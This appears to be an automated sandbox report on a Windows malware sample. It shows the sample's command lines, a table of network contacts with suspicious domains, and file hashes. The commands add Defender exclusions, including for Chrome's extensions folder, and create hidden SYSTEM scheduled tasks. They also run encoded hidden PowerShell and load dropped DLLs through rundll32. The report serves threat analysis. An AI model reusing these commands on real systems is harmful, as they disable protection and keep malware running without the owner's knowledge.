C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRknkcelR" /SC once /ST 04:47:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRknkcelR"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRknkcelR"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 00:17:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe\" Wy /GCDxdidHR 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe Wy /GCDxdidHR 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 776
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\sEGvbu.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "OcPshDNvhDnVmSv2" /F /xml "C:\Program Files (x86)\UQtSSXvqU\epowzXZ.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "OcPshDNvhDnVmSv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qjEkZtbojbmFFd" /F /xml "C:\Program Files (x86)\AMqhlrBDqRJU2\BeqXEUx.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "SzzOVfCIijTTD2" /F /xml "C:\ProgramData\CSlqozbqXBZGgaVB\HyjwEhT.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "PiigmmnlzELKpVpJK2" /F /xml "C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PgPwesd.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XrMInsNlrWTcBhRONQr2" /F /xml "C:\Program Files (x86)\hMiQKFvmPLjeC\KeeYAat.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MRTHivZIQsRdEanwm" /SC once /ST 02:04:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll\",#1 /ftrGdidUG 757674" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2484
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MRTHivZIQsRdEanwm"
\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll",#1 /ftrGdidUG 757674
C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wqgwJMWXAwfbGfvq\fEWQCdtm\nPEEtpq.dll",#1 /ftrGdidUG 757674
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPIEUdZLMYPzsiUNM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 1796
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "MRTHivZIQsRdEanwm"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ify.ac | udp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 8.8.8.8:53 | 171.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | oasqi.nxt-psh.com | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | nxt-psh.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.194.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.21.88.77.in-addr.arpa | udp |
| US | 172.67.194.119:443 | nxt-psh.com | tcp |
| US | 172.67.194.119:443 | nxt-psh.com | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| US | 172.67.211.171:443 | ify.ac | tcp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.19.199.152.in-addr.arpa | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.142.88:443 | www.bing.com | tcp |
| GB | 92.123.142.88:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 144.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | soneremonasez.shop | udp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 8.8.8.8:53 | 145.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 95.100.245.168:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.200.46:443 | google.com | tcp |
| GB | 142.250.200.46:443 | google.com | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| US | 172.67.180.145:443 | soneremonasez.shop | tcp |
| GB | 95.100.245.168:80 | x2.c.lencr.org | tcp |
| GB | 95.100.245.168:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 104.21.70.174:443 | senzamenuzaes.shop | tcp |
| US | 8.8.8.8:53 | 174.70.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 224.74.21.104.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | clck.ru | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 8.8.8.8:53 | 221.204.180.213.in-addr.arpa | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| US | 8.8.8.8:53 | adfstat.yandex.ru | udp |
| RU | 87.250.250.145:443 | adfstat.yandex.ru | tcp |
| RU | 87.250.250.145:443 | adfstat.yandex.ru | tcp |
| US | 8.8.8.8:53 | captcha-backgrounds.s3.yandex.net | udp |
| US | 8.8.8.8:53 | yastatic.net | udp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 178.154.131.217:443 | yastatic.net | tcp |
| RU | 93.158.134.158:443 | captcha-backgrounds.s3.yandex.net | tcp |
| RU | 93.158.134.158:443 | captcha-backgrounds.s3.yandex.net | tcp |
| US | 8.8.8.8:53 | 145.250.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.131.154.178.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 213.180.204.221:443 | clck.ru | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| RU | 87.250.251.119:443 | mc.yandex.com | tcp |
| US | 8.8.8.8:53 | 158.134.158.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | z3n.mom | udp |
| US | 172.67.137.159:443 | z3n.mom | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| NL | 185.26.182.111:443 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | 119.251.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.137.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.182.26.185.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| RU | 95.163.241.63:80 | 95.163.241.63 | tcp |
| US | 8.8.8.8:53 | stockframe.site | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 172.67.143.173:443 | stockframe.site | tcp |
| US | 8.8.8.8:53 | 63.241.163.95.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | bobisawinner.xyz | udp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 8.8.8.8:53 | 173.143.67.172.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 231.88.117.185.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| SE | 185.117.88.231:80 | bobisawinner.xyz | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | features.opera-api2.com | udp |
| NL | 82.145.216.15:443 | features.opera-api2.com | tcp |
| US | 8.8.8.8:53 | download.opera.com | udp |
| NL | 82.145.216.23:443 | download.opera.com | tcp |
| US | 8.8.8.8:53 | 121.217.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.216.145.82.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | download3.operacdn.com | udp |
| GB | 2.17.209.148:443 | download3.operacdn.com | tcp |
| US | 8.8.8.8:53 | 23.216.145.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.209.17.2.in-addr.arpa | udp |
| US | 104.21.74.224:80 | soneservice.shop | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | 250.117.210.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | soneservice.shop | udp |
| US | 172.67.164.12:80 | soneservice.shop | tcp |
| US | 8.8.8.8:53 | 12.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 44.240.96.128:80 | api.check-data.xyz | tcp |
| US | 8.8.8.8:53 | 26.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.96.240.44.in-addr.arpa | udp |
| HK | 141.98.234.31:53 | bdugjdx.com | udp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.f.1.a.e.2.6.d.8.ip6.arpa | udp |
| LT | 94.156.8.80:80 | bdugjdx.com | tcp |
| US | 8.8.8.8:53 | 80.8.156.94.in-addr.arpa | udp |
Files
memory/4444-0-0x00000175B9B20000-0x00000175B9B30000-memory.dmp
memory/4444-16-0x00000175B9C20000-0x00000175B9C30000-memory.dmp
memory/4444-35-0x00000175BDE00000-0x00000175BDE02000-memory.dmp
memory/1612-43-0x000001AD0A680000-0x000001AD0A780000-memory.dmp
memory/1612-44-0x000001AD0A680000-0x000001AD0A780000-memory.dmp
memory/4240-72-0x00000242EE180000-0x00000242EE182000-memory.dmp
memory/4240-74-0x00000242EE1A0000-0x00000242EE1A2000-memory.dmp
memory/4240-76-0x00000242EE1C0000-0x00000242EE1C2000-memory.dmp
memory/4240-118-0x00000242FF3D0000-0x00000242FF3D2000-memory.dmp
memory/4240-116-0x00000242FF2C0000-0x00000242FF2C2000-memory.dmp
memory/4240-114-0x00000242FEBE0000-0x00000242FEBE2000-memory.dmp
memory/4240-112-0x00000242FEBC0000-0x00000242FEBC2000-memory.dmp
memory/4240-110-0x00000242FE9E0000-0x00000242FE9E2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml
| MD5 | 8b0ac8541dd6255ef7cca74e9ca8f789 |
| SHA1 | 29cc2acab175195f6cb5afcfdfe55efc60660f29 |
| SHA256 | 7cd5098a706bdd3f29bb37dacf423ec560f28b461325519b261f3c766133d18d |
| SHA512 | ffd9aaab0bfee370c5d2f2fcaaa72d57a21996b3d52c20ec6f0dd27132e85cf465d64285c7812bd117ed8a881f8b129b05652c40b22bd8b9adf95faa867f38ea |
memory/4444-199-0x00000175C0440000-0x00000175C0441000-memory.dmp
memory/4444-200-0x00000175C0450000-0x00000175C0451000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\RPVGOA6E\favicon[1].ico
| MD5 | de5a68ecf1315791471000eea42de65d |
| SHA1 | 3f3e7239d7ec1702868f51e9d28e528c6c60e984 |
| SHA256 | fb94090003c3fd820119448548cb3f11a37304608d1f7401824111f53cfbe61f |
| SHA512 | 0b5b8b073714ec8e0cd1992d722c669515ce589d14f4dc224e9c1830c4aa8d3473c441758f8128f381607c85acfd015b1fa0f271c4595c33f4d162eab69f2501 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml
| MD5 | db5bae13827c1cffd478c924a8f6f86a |
| SHA1 | 1415adad40f15c5faecdf765084446ff4fcd3b75 |
| SHA256 | 0b61d4184c11b49bd857c4ed34cd623736cb7f3b0cec13d95991a612886b10fb |
| SHA512 | ca4eeb9d231ff2c60b1ca814164b386dcca38556a5fb21cfabf36e4986e9648fab7a9423f5047fdfa58acb44ea37483a004568eb97e680e91569a0ef96fe3630 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 1bfe591a4fe3d91b03cdf26eaacd8f89 |
| SHA1 | 719c37c320f518ac168c86723724891950911cea |
| SHA256 | 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8 |
| SHA512 | 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZVQ9VIUB\edgecompatviewlist[1].xml
| MD5 | d4fc49dc14f63895d997fa4940f24378 |
| SHA1 | 3efb1437a7c5e46034147cbbc8db017c69d02c31 |
| SHA256 | 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1 |
| SHA512 | cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a |
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\SZWNFRYG\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
memory/4240-342-0x0000023A80170000-0x0000023A80172000-memory.dmp
memory/4240-344-0x0000023A80340000-0x0000023A80342000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\User\Default\DOMStore\4SRT3UGD\ify[1].xml
| MD5 | 1dabffa04edc39a7cc774832bd96f73b |
| SHA1 | 1e76fdb3cfc293ed5629494f8a46220e7370e9b4 |
| SHA256 | 4211b66c4b8ee1632fb51195c0709f9cd485df55222fff1f2b9df36cf3b68319 |
| SHA512 | 680a1f5fcb1092f0516557f79fa8b08564ba0395bb0a91510c33f9a2c66a6d1280068c798d5bd6edf2544a7e93d6b450b53420d54dd04482f266b211d64f0797 |
memory/4472-393-0x000001EBF2290000-0x000001EBF2292000-memory.dmp
memory/4472-397-0x000001EBF22C0000-0x000001EBF22C2000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
| MD5 | 8d1040b12a663ca4ec7277cfc1ce44f0 |
| SHA1 | b27fd6bbde79ebdaee158211a71493e21838756b |
| SHA256 | 3086094d4198a5bbd12938b0d2d5f696c4dfc77e1eae820added346a59aa8727 |
| SHA512 | 610c72970856ef7a316152253f7025ac11635078f1aea7b84641715813792374d2447b1002f1967d62b24073ee291b3e4f3da777b71216a30488a5d7b6103ac1 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
| MD5 | 90ebbe44df22bb1b6602c524b22e3c6e |
| SHA1 | 73e705904a8010f207ea6a5ad8f64d17088446bc |
| SHA256 | d12822821417920ea2ec96eee0ad567d32371a28b670ff689c871bcf55530ad5 |
| SHA512 | 89d8f37c6a55925e7a50d47f7d063c0ef70ae274bbc498e432f2be15265d01707b923002ec50c90d9c54c79ed0a3d3c44f2c8e15f03ea2b437441236625989f9 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB
| MD5 | 5472b509c2b20fdbb61940a5c1949db9 |
| SHA1 | 0c19c43efe989d5f483539628794868b4e370442 |
| SHA256 | cf1d223e59007bb49aac397f89ab34b75a086424211e884fa5ffde34bddf4167 |
| SHA512 | 1f96a3e01a6ec7d1abdcf3361966cdd922878f44501173ae92217b37eee0299b405f25d0763eb45c6ead727f1bd91877ebb74648acc6d62730bf93264c1480d5 |
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_857450206B889F4FEA0F888FA03D68DB
| MD5 | 99eb0642fb9b1f739c04bc5ea3c6f154 |
| SHA1 | e11ad7dc0004e4c53ff7fdf0af41e03f0289f380 |
| SHA256 | f4a8c948032569b65fb9c1505f971e1ba07b5e63df7a6bfb669789f8a5c995d7 |
| SHA512 | 6d5c61dc783cba10eb655b90f53350f99e45bd12447be72e7f9a58b1bfadae9076ad25ff7a4f26ff91fc7ab765bac2b56ef99260fa840faf358c3260cdab3c02 |
